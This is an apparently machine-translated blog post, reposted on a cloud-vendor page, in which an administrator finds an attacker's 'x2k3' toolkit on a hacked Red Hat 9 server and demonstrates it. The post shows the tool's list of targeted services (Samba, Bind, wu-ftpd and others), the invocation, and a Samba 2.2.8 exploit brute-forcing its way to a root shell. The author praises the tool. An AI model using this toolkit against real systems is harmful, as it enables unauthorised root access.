Default Samba version overflow on Redhat 9 Get Root Demo _ Vulnerability Research

Source: Internet
Author: User
From the recent security analysis of the hacked server, I found the tool to elevate the user's privileges. He was using Samba's security vulnerabilities to elevate to root.
These days the server was installed with the Samba server because it was being tested on the public network. And the next day we found out that the server was hacked.
Samba is the default version on Redhat Linux 9. Use the hacker's powerful exploit tool to elevate the root.
Ascension to Root only takes a short 3 seconds
You sweat A
Find a x2k3 directory from the server's TMP check
[Bob@learnin9 tmp]$ CD x2k3/
[Bob@learnin9 x2k3]$ ls
Bind ftp gkr identd r00t Samba
[Bob@learnin9 x2k3]$
Bind FTP Gkr Identd Samba is a directory, r00t for a program, let's look at the implementation of the R00T program
[Bob@learnin9 x2k3]$./r00t
.--------------------------------.
| X2K3/
| Written by Natok/
+------------------------+----.
| Targets: [1] Samba | <= 2.2.8
| [2] Bind | 8.3.2/8.3.3/9.2.1
| [3] GKRELLMD | <2.1.12
| [4] wu_ftpd | <=2.6.1
| [5] identd | 1.2
+------------------------+----.
| Http://www.natok.de/
|____________________________/
./r00t
[Bob@learnin9 x2k3]$./r00t 127.0.0.1 1
[*] Range to scan:127.0.0.0
[*] Socket Connecting to port:139
[*] Press Control+c for skipping!
Port 139 IP 127.0.0.0-> Connection refused!
Port 139 IP 127.0.0.1-> Connection ok!
[+] Let ' s sploit;--)
samba-2.2.8 < remote root exploit by Esdee (Www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ bruteforce mode. (Linux)
+ Host is running Samba.
+ Using ret: [0XBFFFFED4]
+ Using ret: [0XBFFFFDA8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0XBFFFFB50]
+ Using ret: [0xbffffa24]
+ Using ret: [0xbffff8f8]
+ Using ret: [0xbffff7cc]
+ Using ret: [0xbffff6a0]
+ Using ret: [0xbffff574]
+ Using ret: [0xbffff448]
+ Using ret: [0xbffff31c]
+ Using ret: [0xbffff1f0]
+ Using ret: [0XBFFFF0C4]
+ Using ret: [0xbfffef98]
+ Using ret: [0xbfffee6c]
+ Using ret: [0XBFFFED40]
+ Using ret: [0xbfffec14]
+ Using ret: [0xbfffeae8]
+ Using ret: [0XBFFFE9BC]
+ Using ret: [0xbfffe890]
+ Using ret: [0xbfffe764]
+ Using ret: [0xbfffe638]
+ Using ret: [0xbfffe50c]
+ Using ret: [0XBFFFE3E0]
+ Using ret: [0XBFFFE2B4]
+ Using ret: [0xbfffe188]
+ worked!
--------------------------------------------------------------
JE MOET JE Muil Houwe
Linux learnin9 2.4.20-8 #1 Thu Mar 17:54:28 EST 2003 i686 i686 i386-Gnu/linux
Uid=0 (Root) gid=0 (root) groups=99 (nobody)
Id
Uid=0 (Root) gid=0 (root) groups=99 (nobody)
See it. It's so easy to be captured as root.
I just localhost the way, in fact, remote is the same direct access to root.
Please take a good look at your own Redhat 9. RPM-QA |GREP * * * * * * * * * is sweating already out?
There are also bind GKRELLMD wu_ftpd identd these overflow programs. I do not know whether these procedures are part of the hacker community has not disclosed the overflow program. Oh!
My server did not start bind, GKRELLMD, WU_FTPD, Identd, only started the default installation of Samba, but also on the public web, so the hacker won the lottery to invade my server. Welcome to congratulate, I have finally found such a good tool.
Rejoice in yourself. Went to see the http://www.natok.de/incredibly found is the Chinese website, who is inside? I'm curious.
It can be said that the R00T program was written by Natok, but the exploit program was not written by him, he just categorized the other overflow programs. Made a friendly interface, but can be collected or very strong.
Hope to get to know this guy!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.